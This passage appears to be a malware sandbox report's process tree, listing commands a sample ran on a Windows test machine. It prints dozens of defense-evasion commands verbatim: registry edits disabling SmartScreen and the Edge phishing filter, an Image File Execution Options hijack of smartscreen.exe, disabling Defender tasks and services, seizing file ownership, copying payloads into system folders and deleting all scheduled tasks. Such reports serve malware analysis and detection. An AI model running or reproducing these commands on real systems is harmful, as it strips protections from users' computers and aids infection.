                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:2416
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:4384
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:5156
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                                        PID:5076
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:3784
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5128
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4060
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:1140
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:2036
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:3980
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:1420
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:5944
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f /reg:64
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:60
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:3140
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:696
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:5476
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:5472
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:4568
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:5840
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:4132
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:3552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:592
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:5532
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:3768
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:5816
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:5692
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                  C:\Windows\System32\sc.exe config webthreatdefsvc start= disabled
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                  PID:5228
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                  C:\Windows\System32\sc.exe config webthreatdefusersvc start= disabled
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:5764
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                  C:\Windows\System32\takeown.exe /s JXPVMCYC /u Admin /f "C:\Windows\System32\smartscreen.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:2860
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  C:\Windows\System32\icacls.exe "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:2244
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  C:\Windows\System32\taskkill.exe /im smartscreen.exe /f
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:2456
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\*.*"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                  PID:2944
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:5948
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:5820
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:848
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                    xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:3300
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                      xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:5220
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:1036
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                        xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:3128
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:1040
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                          xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:5496
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:3868
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                            xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:1216
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                              xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                              PID:2996
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:716
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                PID:4664
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:1908
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                    xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                    PID:2956
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:3460
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                      xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                      PID:2960
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:6116
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                        xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                        PID:5956
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:3744
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_OK.ini"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_ERRO.ini"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:3556
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:536
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:5000
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:2720
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:4796
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:5232
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:3516
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe +h +r +s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:4824
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\L2cache"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:3084
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:4696
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:5252
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:6048
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:5656
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:4440
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:824
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                                            PID:5264
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:3832
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:4468
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'Intel(R) Utiliti'" call stopservice
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2252
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Intel(R) Utiliti'" Call Delete
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:436
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe stop "Intel(R) Utiliti"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                PID:2876
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\SC.exe DELETE "Intel(R) Utiliti"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                                PID:3864
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /Delete /TN * /F
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:2000
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                                  PID:2536
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                                  PID:1280
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                                  PID:868
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
